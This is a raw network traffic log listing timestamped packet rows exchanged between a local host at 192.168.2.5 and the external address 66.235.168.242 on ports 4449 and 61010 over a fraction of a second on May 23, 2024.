May 23, 2024 15:34:11.934789896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.934823990 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.935555935 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.935566902 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.935616970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.936281919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.936292887 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.936330080 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.937084913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.937094927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.937136889 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.938023090 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.938033104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.938040972 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.938070059 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.938577890 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.938642979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.938999891 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.939009905 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.939066887 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.939753056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.939763069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.939805984 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.942029953 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.942039967 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.942049980 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.942071915 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.942356110 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.942367077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.942377090 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.942450047 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.943078041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.946854115 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.946919918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.947617054 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.947628021 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.947670937 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.948461056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.948472023 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.948508978 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.949162006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.949172974 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.949181080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.949208021 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.950000048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.950011015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.950052977 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.950696945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.950706959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.950736046 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.951495886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.951508045 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.951545954 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.952373028 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.952383995 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.952421904 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.953066111 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.953075886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.953084946 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.953109026 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.953135014 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.953824043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.953835011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.953872919 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.954627991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.954638958 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.954679012 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.955409050 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.956178904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.956188917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.956228971 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.956962109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.956974030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.957012892 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.957709074 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.957720995 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.957729101 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.957756996 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.957786083 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.958496094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.958507061 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.958542109 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.959287882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.959297895 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.959338903 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.960068941 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.960079908 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.960122108 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.960885048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.960895061 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.960903883 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.960927963 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.961566925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.961577892 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.961622000 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.962207079 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.962256908 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.962609053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.962999105 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.963051081 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.963381052 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.963762999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.963799953 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.964168072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.964507103 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.964550972 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.965023041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.966023922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.966056108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.966082096 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.966237068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.966284037 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.966986895 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.967204094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.967248917 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.968173981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.968405962 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.968451023 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.968703032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.969196081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.969235897 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.970093966 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.970307112 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.970345974 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.970902920 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.971117973 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.971157074 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.973675966 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.973686934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.973700047 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.973711014 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.973718882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.973726034 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.973730087 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.973757029 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.973784924 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.974013090 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.974245071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.974288940 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.974541903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.974751949 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.974796057 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.975480080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.975660086 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.975711107 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.976239920 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.976408005 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.976447105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.977010965 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.977214098 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.977252960 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.977802992 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.978776932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.978786945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.978832960 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.978928089 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.978967905 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.979279041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.979499102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.979538918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.980423927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.980433941 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.980475903 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.980878115 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.981050014 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.981095076 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.981653929 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.981813908 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.981852055 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.982418060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.983184099 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.983194113 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.983236074 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.983406067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.983458042 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.983959913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.984127998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.984178066 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.984405994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.984716892 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.984765053 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.985482931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.985632896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.985677958 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.986274004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.986427069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.986466885 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.987036943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.987186909 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.987236977 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.987829924 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.988590956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.988600969 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.988636971 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.988758087 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.988797903 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.989152908 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.989413023 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.989454031 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.990144968 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.990318060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.990358114 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.990875006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.991060972 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.991107941 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.991692066 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.991807938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.991846085 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.992458105 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.993839025 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.993849039 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.993858099 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.993911982 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.993993044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.994168043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.994211912 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.994465113 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.994741917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.995515108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.995572090 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.995682001 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.995727062 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.996284008 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.996431112 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.997047901 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.997108936 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.997224092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.997268915 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.997819901 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.998637915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.998647928 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.998687983 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.998789072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.998826981 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.999377966 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.999555111 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.999849081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.999886990 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.000142097 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.000179052 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.001343012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.001530886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.001827955 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.001877069 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.002109051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.002497911 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.002553940 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.002784967 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.002825975 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.003209114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.003973961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.003984928 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.004046917 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.004144907 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.004193068 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.004749060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.004900932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.005182981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.005239964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.005839109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.005893946 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.006356955 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.006496906 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.006560087 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.007103920 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.007271051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.007847071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.007935047 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.008023977 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.008610964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.008665085 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.009386063 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.009397030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.009437084 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.009555101 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.009598970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.010163069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.010293961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.010632992 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.010679007 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.010945082 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.010986090 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.011698961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.011836052 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.012480021 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.012537003 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.012603998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.012643099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.013278961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.013381004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.013963938 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.014257908 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.014270067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.014281034 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.014312029 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.014877081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.014919996 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.015083075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.015311003 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.015605927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.015650034 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.015861034 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.015907049 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.016041040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.016326904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.016962051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.017009974 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.017112017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.017148972 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.017420053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.017875910 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.017968893 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.018435955 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.018448114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.018518925 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.018874884 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.018887043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.018935919 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.020116091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.020277977 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.020287991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.020343065 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.020720959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.020767927 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.020844936 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.021518946 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.021966934 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.022142887 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.022298098 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.022619009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.022665977 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.022841930 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.022883892 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.023487091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.023523092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.024552107 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.025615931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.026130915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.026279926 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.026412964 CEST	61010	4449	192.168.2.5	66.235.168.242
